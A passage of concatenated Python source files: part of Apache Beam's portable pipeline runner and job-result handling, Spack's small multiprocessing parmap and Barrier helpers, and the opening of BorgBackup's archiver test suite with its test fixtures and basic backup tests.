self.stage(
proto_pipeline,
prepare_response.artifact_staging_endpoint.url,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self, pipeline, artifact_staging_endpoint, staging_session_token):
# type: (...) -> Optional[Any]
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer()
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# Preemptively apply combiner lifting, until all runners support it.
# These optimizations commute and are idempotent.
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'lift_combiners').lower()
if not options.view_as(StandardOptions).streaming:
flink_known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
if pre_optimize == 'none':
pass
elif pre_optimize == 'all':
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=[
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# fn_api_runner_transforms.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
],
known_runner_urns=flink_known_urns)
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in 'lift_combiners':
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=flink_known_urns,
partial=True)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=sdk_worker_main._get_state_cache_size(options),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(options),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
for x, y in zip(self.committed, self.attempted)
]
return {
self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges
}
class PipelineResult(runner.PipelineResult):
def __init__(
self,
job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks=()):
super(PipelineResult, self).__init__(beam_job_api_pb2.JobState.UNSPECIFIED)
self._job_service = job_service
self._job_id = job_id
self._messages = []
self._message_stream = message_stream
self._state_stream = state_stream
self._cleanup_callbacks = cleanup_callbacks
self._metrics = None
self._runtime_exception = None
def cancel(self):
try:
self._job_service.Cancel(
beam_job_api_pb2.CancelJobRequest(job_id=self._job_id))
finally:
self._cleanup()
@property
def state(self):
runner_api_state = self._job_service.GetState(
beam_job_api_pb2.GetJobStateRequest(job_id=self._job_id)).state
self._state = self._runner_api_state_to_pipeline_state(runner_api_state)
return self._state
@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
multiproc.py
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This implements a parallel map operation but it can accept more values
than multiprocessing.Pool.apply() can. For example, apply() will fail
to pickle functions if they're passed indirectly as parameters.
"""
from multiprocessing import Process, Pipe, Semaphore, Value
__all__ = ['spawn', 'parmap', 'Barrier']
def spawn(f):
def fun(pipe, x):
pipe.send(f(x))
pipe.close()
return fun
def parmap(f, elements):
pipe = [Pipe() for x in elements]
proc = [Process(target=spawn(f), args=(c, x))
for x, (p, c) in zip(elements, pipe)]
[p.start() for p in proc]
[p.join() for p in proc]
return [p.recv() for (p, c) in pipe]
class Barrier:
"""Simple reusable semaphore barrier.
Python 2.6 doesn't have multiprocessing barriers so we implement this.
See http://greenteapress.com/semaphores/downey08semaphores.pdf, p. 41.
"""
def __init__(self, n, timeout=None):
self.n = n
self.to = timeout
self.count = Value('i', 0)
self.mutex = Semaphore(1)
self.turnstile1 = Semaphore(0)
self.turnstile2 = Semaphore(1)
def wait(self):
if not self.mutex.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.count.value += 1
if self.count.value == self.n:
if not self.turnstile2.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.turnstile1.release()
self.mutex.release()
if not self.turnstile1.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.turnstile1.release()
if not self.mutex.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.count.value -= 1
if self.count.value == 0:
if not self.turnstile1.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.turnstile2.release()
self.mutex.release()
if not self.turnstile2.acquire(timeout=self.to):
raise BarrierTimeoutError()
self.turnstile2.release()
class BarrierTimeoutError(Exception):
pass
|
archiver.py
|
import argparse
import dateutil.tz
import errno
import io
import json
import logging
import os
import pstats
import random
import re
import shutil
import socket
import stat
import subprocess
import sys
import tempfile
import time
import unittest
from binascii import unhexlify, b2a_base64
from configparser import ConfigParser
from datetime import datetime
from datetime import timezone
from datetime import timedelta
from hashlib import sha256
from io import BytesIO, StringIO
from unittest.mock import patch
import pytest
import borg
from .. import xattr, helpers, platform
from ..archive import Archive, ChunkBuffer
from ..archiver import Archiver, parse_storage_quota, PURE_PYTHON_MSGPACK_WARNING
from ..cache import Cache, LocalCache
from ..chunker import has_seek_hole
from ..constants import * # NOQA
from ..crypto.low_level import bytes_to_long, num_cipher_blocks
from ..crypto.key import KeyfileKeyBase, RepoKey, KeyfileKey, Passphrase, TAMRequiredError
from ..crypto.keymanager import RepoIdMismatch, NotABorgKeyFile
from ..crypto.file_integrity import FileIntegrityError
from ..helpers import Location, get_security_dir
from ..helpers import Manifest, MandatoryFeatureUnsupported
from ..helpers import EXIT_SUCCESS, EXIT_WARNING, EXIT_ERROR
from ..helpers import bin_to_hex
from ..helpers import MAX_S
from ..helpers import msgpack
from ..helpers import flags_noatime, flags_normal
from ..nanorst import RstToTextLazy, rst_to_terminal
from ..patterns import IECommand, PatternMatcher, parse_pattern
from ..item import Item, ItemDiff
from ..locking import LockFailed
from ..logger import setup_logging
from ..remote import RemoteRepository, PathNotAllowed
from ..repository import Repository
from . import has_lchflags, llfuse
from . import BaseTestCase, changedir, environment_variable, no_selinux
from . import are_symlinks_supported, are_hardlinks_supported, are_fifos_supported, is_utime_fully_supported, is_birthtime_fully_supported
from .platform import fakeroot_detected
from .upgrader import make_attic_repo
from . import key
src_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
def exec_cmd(*args, archiver=None, fork=False, exe=None, input=b'', binary_output=False, **kw):
if fork:
try:
if exe is None:
borg = (sys.executable, '-m', 'borg.archiver')
elif isinstance(exe, str):
borg = (exe, )
elif not isinstance(exe, tuple):
raise ValueError('exe must be None, a tuple or a str')
output = subprocess.check_output(borg + args, stderr=subprocess.STDOUT, input=input)
ret = 0
except subprocess.CalledProcessError as e:
output = e.output
ret = e.returncode
except SystemExit as e: # possibly raised by argparse
output = ''
ret = e.code
if binary_output:
return ret, output
else:
return ret, os.fsdecode(output)
else:
stdin, stdout, stderr = sys.stdin, sys.stdout, sys.stderr
try:
sys.stdin = StringIO(input.decode())
sys.stdin.buffer = BytesIO(input)
output = BytesIO()
# Always use utf-8 here, to simply .decode() below
output_text = sys.stdout = sys.stderr = io.TextIOWrapper(output, encoding='utf-8')
if archiver is None:
archiver = Archiver()
archiver.prerun_checks = lambda *args: None
archiver.exit_code = EXIT_SUCCESS
helpers.exit_code = EXIT_SUCCESS
try:
args = archiver.parse_args(list(args))
# argparse parsing may raise SystemExit when the command line is bad or
# actions that abort early (eg. --help) where given. Catch this and return
# the error code as-if we invoked a Borg binary.
except SystemExit as e:
output_text.flush()
return e.code, output.getvalue() if binary_output else output.getvalue().decode()
ret = archiver.run(args)
output_text.flush()
return ret, output.getvalue() if binary_output else output.getvalue().decode()
finally:
sys.stdin, sys.stdout, sys.stderr = stdin, stdout, stderr
def have_gnutar():
if not shutil.which('tar'):
return False
popen = subprocess.Popen(['tar', '--version'], stdout=subprocess.PIPE)
stdout, stderr = popen.communicate()
return b'GNU tar' in stdout
# check if the binary "borg.exe" is available (for local testing a symlink to virtualenv/bin/borg should do)
try:
exec_cmd('help', exe='borg.exe', fork=True)
BORG_EXES = ['python', 'binary', ]
except FileNotFoundError:
BORG_EXES = ['python', ]
@pytest.fixture(params=BORG_EXES)
def cmd(request):
if request.param == 'python':
exe = None
elif request.param == 'binary':
exe = 'borg.exe'
else:
raise ValueError("param must be 'python' or 'binary'")
def exec_fn(*args, **kw):
return exec_cmd(*args, exe=exe, fork=True, **kw)
return exec_fn
def test_return_codes(cmd, tmpdir):
repo = tmpdir.mkdir('repo')
input = tmpdir.mkdir('input')
output = tmpdir.mkdir('output')
input.join('test_file').write('content')
rc, out = cmd('init', '--encryption=none', '%s' % str(repo))
assert rc == EXIT_SUCCESS
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_SUCCESS
with changedir(str(output)):
rc, out = cmd('extract', '%s::archive' % repo)
assert rc == EXIT_SUCCESS
rc, out = cmd('extract', '%s::archive' % repo, 'does/not/match')
assert rc == EXIT_WARNING # pattern did not match
rc, out = cmd('create', '%s::archive' % repo, str(input))
assert rc == EXIT_ERROR # duplicate archive name
"""
test_disk_full is very slow and not recommended to be included in daily testing.
for this test, an empty, writable 16MB filesystem mounted on DF_MOUNT is required.
for speed and other reasons, it is recommended that the underlying block device is
in RAM, not a magnetic or flash disk.
assuming /tmp is a tmpfs (in memory filesystem), one can use this:
dd if=/dev/zero of=/tmp/borg-disk bs=16M count=1
mkfs.ext4 /tmp/borg-disk
mkdir /tmp/borg-mount
sudo mount /tmp/borg-disk /tmp/borg-mount
if the directory does not exist, the test will be skipped.
"""
DF_MOUNT = '/tmp/borg-mount'
@pytest.mark.skipif(not os.path.exists(DF_MOUNT), reason="needs a 16MB fs mounted on %s" % DF_MOUNT)
def test_disk_full(cmd):
def make_files(dir, count, size, rnd=True):
shutil.rmtree(dir, ignore_errors=True)
os.mkdir(dir)
if rnd:
count = random.randint(1, count)
if size > 1:
size = random.randint(1, size)
for i in range(count):
fn = os.path.join(dir, "file%03d" % i)
with open(fn, 'wb') as f:
data = os.urandom(size)
f.write(data)
with environment_variable(BORG_CHECK_I_KNOW_WHAT_I_AM_DOING='YES'):
mount = DF_MOUNT
assert os.path.exists(mount)
repo = os.path.join(mount, 'repo')
input = os.path.join(mount, 'input')
reserve = os.path.join(mount, 'reserve')
for j in range(100):
shutil.rmtree(repo, ignore_errors=True)
shutil.rmtree(input, ignore_errors=True)
# keep some space and some inodes in reserve that we can free up later:
make_files(reserve, 80, 100000, rnd=False)
rc, out = cmd('init', repo)
if rc != EXIT_SUCCESS:
print('init', rc, out)
assert rc == EXIT_SUCCESS
try:
success, i = True, 0
while success:
i += 1
try:
make_files(input, 20, 200000)
except OSError as err:
if err.errno == errno.ENOSPC:
# already out of space
break
raise
try:
rc, out = cmd('create', '%s::test%03d' % (repo, i), input)
success = rc == EXIT_SUCCESS
if not success:
print('create', rc, out)
finally:
# make sure repo is not locked
shutil.rmtree(os.path.join(repo, 'lock.exclusive'), ignore_errors=True)
os.remove(os.path.join(repo, 'lock.roster'))
finally:
# now some error happened, likely we are out of disk space.
# free some space so we can expect borg to be able to work normally:
shutil.rmtree(reserve, ignore_errors=True)
rc, out = cmd('list', repo)
if rc != EXIT_SUCCESS:
print('list', rc, out)
rc, out = cmd('check', '--repair', repo)
if rc != EXIT_SUCCESS:
print('check', rc, out)
assert rc == EXIT_SUCCESS
class ArchiverTestCaseBase(BaseTestCase):
EXE = None # python source based
FORK_DEFAULT = False
prefix = ''
def setUp(self):
os.environ['BORG_CHECK_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_DELETE_I_KNOW_WHAT_I_AM_DOING'] = 'YES'
os.environ['BORG_PASSPHRASE'] = 'waytooeasyonlyfortests'
self.archiver = not self.FORK_DEFAULT and Archiver() or None
self.tmpdir = tempfile.mkdtemp()
self.repository_path = os.path.join(self.tmpdir, 'repository')
self.repository_location = self.prefix + self.repository_path
self.input_path = os.path.join(self.tmpdir, 'input')
self.output_path = os.path.join(self.tmpdir, 'output')
self.keys_path = os.path.join(self.tmpdir, 'keys')
self.cache_path = os.path.join(self.tmpdir, 'cache')
self.exclude_file_path = os.path.join(self.tmpdir, 'excludes')
self.patterns_file_path = os.path.join(self.tmpdir, 'patterns')
os.environ['BORG_KEYS_DIR'] = self.keys_path
os.environ['BORG_CACHE_DIR'] = self.cache_path
os.mkdir(self.input_path)
os.chmod(self.input_path, 0o777) # avoid troubles with fakeroot / FUSE
os.mkdir(self.output_path)
os.mkdir(self.keys_path)
os.mkdir(self.cache_path)
with open(self.exclude_file_path, 'wb') as fd:
fd.write(b'input/file2\n# A comment line, then a blank line\n\n')
with open(self.patterns_file_path, 'wb') as fd:
fd.write(b'+input/file_important\n- input/file*\n# A comment line, then a blank line\n\n')
self._old_wd = os.getcwd()
os.chdir(self.tmpdir)
def tearDown(self):
os.chdir(self._old_wd)
# note: ignore_errors=True as workaround for issue #862
shutil.rmtree(self.tmpdir, ignore_errors=True)
setup_logging()
def cmd(self, *args, **kw):
exit_code = kw.pop('exit_code', 0)
fork = kw.pop('fork', None)
binary_output = kw.get('binary_output', False)
if fork is None:
fork = self.FORK_DEFAULT
ret, output = exec_cmd(*args, fork=fork, exe=self.EXE, archiver=self.archiver, **kw)
if ret != exit_code:
print(output)
self.assert_equal(ret, exit_code)
# if tests are run with the pure-python msgpack, there will be warnings about
# this in the output, which would make a lot of tests fail.
pp_msg = PURE_PYTHON_MSGPACK_WARNING.encode() if binary_output else PURE_PYTHON_MSGPACK_WARNING
empty = b'' if binary_output else ''
output = empty.join(line for line in output.splitlines(keepends=True)
if pp_msg not in line)
return output
def create_src_archive(self, name):
self.cmd('create', '--compression=lz4', self.repository_location + '::' + name, src_dir)
def open_archive(self, name):
repository = Repository(self.repository_path, exclusive=True)
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
archive = Archive(repository, key, manifest, name)
return archive, repository
def open_repository(self):
return Repository(self.repository_path, exclusive=True)
def create_regular_file(self, name, size=0, contents=None):
assert not (size != 0 and contents and len(contents) != size), 'size and contents do not match'
filename = os.path.join(self.input_path, name)
if not os.path.exists(os.path.dirname(filename)):
os.makedirs(os.path.dirname(filename))
with open(filename, 'wb') as fd:
if contents is None:
contents = b'X' * size
fd.write(contents)
def create_test_files(self):
"""Create a minimal test case including all supported file types
"""
# File
self.create_regular_file('file1', size=1024 * 80)
self.create_regular_file('flagfile', size=1024)
# Directory
self.create_regular_file('dir2/file2', size=1024 * 80)
# File mode
os.chmod('input/file1', 0o4755)
# Hard link
if are_hardlinks_supported():
os.link(os.path.join(self.input_path, 'file1'),
os.path.join(self.input_path, 'hardlink'))
# Symlink
if are_symlinks_supported():
os.symlink('somewhere', os.path.join(self.input_path, 'link1'))
self.create_regular_file('fusexattr', size=1)
if not xattr.XATTR_FAKEROOT and xattr.is_enabled(self.input_path):
fn = os.fsencode(os.path.join(self.input_path, 'fusexattr'))
# ironically, due to the way how fakeroot works, comparing FUSE file xattrs to orig file xattrs
# will FAIL if fakeroot supports xattrs, thus we only set the xattr if XATTR_FAKEROOT is False.
# This is because fakeroot with xattr-support does not propagate xattrs of the underlying file
# into "fakeroot space". Because the xattrs exposed by borgfs are these of an underlying file
# (from fakeroots point of view) they are invisible to the test process inside the fakeroot.
xattr.setxattr(fn, b'user.foo', b'bar')
xattr.setxattr(fn, b'user.empty', b'')
# XXX this always fails for me
# ubuntu 14.04, on a TMP dir filesystem with user_xattr, using fakeroot
# same for newer ubuntu and centos.
# if this is supported just on specific platform, platform should be checked first,
# so that the test setup for all tests using it does not fail here always for others.
# xattr.setxattr(os.path.join(self.input_path, 'link1'), b'user.foo_symlink', b'bar_symlink', follow_symlinks=False)
# FIFO node
if are_fifos_supported():
os.mkfifo(os.path.join(self.input_path, 'fifo1'))
if has_lchflags:
platform.set_flags(os.path.join(self.input_path, 'flagfile'), stat.UF_NODUMP)
try:
# Block device
os.mknod('input/bdev', 0o600 | stat.S_IFBLK, os.makedev(10, 20))
# Char device
os.mknod('input/cdev', 0o600 | stat.S_IFCHR, os.makedev(30, 40))
# File mode
os.chmod('input/dir2', 0o555) # if we take away write perms, we need root to remove contents
# File owner
os.chown('input/file1', 100, 200) # raises OSError invalid argument on cygwin
have_root = True # we have (fake)root
except PermissionError:
have_root = False
except OSError as e:
# Note: ENOSYS "Function not implemented" happens as non-root on Win 10 Linux Subsystem.
if e.errno not in (errno.EINVAL, errno.ENOSYS):
raise
have_root = False
time.sleep(1) # "empty" must have newer timestamp than other files
self.create_regular_file('empty', size=0)
return have_root
class ArchiverTestCase(ArchiverTestCaseBase):
requires_hardlinks = pytest.mark.skipif(not are_hardlinks_supported(), reason='hardlinks not supported')
def test_basic_functionality(self):
have_root = self.create_test_files()
# fork required to test show-rc output
output = self.cmd('init', '--encryption=repokey', '--show-version', '--show-rc', self.repository_location, fork=True)
self.assert_in('borgbackup version', output)
self.assert_in('terminating with success status, rc 0', output)
self.cmd('create', '--exclude-nodump', self.repository_location + '::test', 'input')
output = self.cmd('create', '--exclude-nodump', '--stats', self.repository_location + '::test.2', 'input')
self.assert_in('Archive name: test.2', output)
self.assert_in('This archive: ', output)
with changedir('output'):
self.cmd('extract', self.repository_location + '::test')
list_output = self.cmd('list', '--short', self.repository_location)
self.assert_in('test', list_output)
self.assert_in('test.2', list_output)
expected = [
'input',
'input/bdev',
'input/cdev',
'input/dir2',
'input/dir2/file2',
'input/empty',
'input/file1',
'input/flagfile',
]
if are_fifos_supported():
expected.append('input/fifo1')
if are_symlinks_supported():
expected.append('input/link1')
if are_hardlinks_supported():
expected.append('input/hardlink')
if not have_root:
# we could not create these device files without (fake)root
expected.remove('input/bdev')
expected.remove('input/cdev')
if has_lchflags:
# remove the file we did not backup, so input and output become equal
expected.remove('input/flagfile') # this file is UF_NODUMP
os.remove(os.path.join('input', 'flagfile'))
list_output = self.cmd('list', '--short', self.repository_location + '::test')
for name in expected:
self.assert_in(name, list_output)
self.assert_dirs_equal('input', 'output/input')
info_output = self.cmd('info', self.repository_location + '::test')
item_count = 4 if has_lchflags else 5 # one file is UF_NODUMP
self.assert_in('Number of files: %d' % item_count, info_output)
shutil.rmtree(self.cache_path)
info_output2 = self.cmd('info', self.repository_location + '::test')
def filter(output):
# filter for interesting "info" output, ignore cache rebuilding related stuff
prefixes = ['Name:', 'Fingerprint:', 'Number of files:', 'This archive:',
'All archives:', 'Chunk index:', ]
result = []
for line in output.splitlines():
for prefix in prefixes:
if line.startswith(prefix):
result.append(line)
return '\n'.join(result)
# the interesting parts of info_output2 and info_output should be same
self.assert_equal(filter(info_output), filter(info_output2))
@requires_hardlinks
def test_create_duplicate_root(self):
# setup for #5603
path_a = os.path.join(self.input_path, 'a')
path_b = os.path.join(self.input_path, 'b')
os.mkdir(path_a)
os.mkdir(path_b)
hl_a = os.path.join(path_a, 'hardlink')
hl_b = os.path.join(path_b, 'hardlink')
self.create_regular_file(hl_a, contents=b'123456')
os.link(hl_a, hl_b)
self.cmd('init', '--encryption=none', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', 'input') # give input twice!
# test if created archive has 'input' contents twice:
archive_list = self.cmd('list', '--json-lines', self.repository_location + '::test')
paths = [json.loads(line)['path'] for line in archive_list.split('\n') if line]
# we have all fs items exactly once!
assert sorted(paths) == ['input', 'input/a', 'input/a/hardlink', 'input/b', 'input/b/hardlink']
def test_init_parent_dirs(self):
parent_path = os.path.join(self.tmpdir, 'parent1', 'parent2')
repository_path = os.path.join(parent_path, 'repository')
repository_location = self.prefix + repository_path
with pytest.raises(Repository.ParentPathDoesNotExist):
# normal borg init does NOT create missing parent dirs
self.cmd('init', '--encryption=none', repository_location)
# but if told so, it does:
self.cmd('init', '--encryption=none', '--make-parent-dirs', repository_location)
assert os.path.exists(parent_path)
def test_unix_socket(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
try:
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
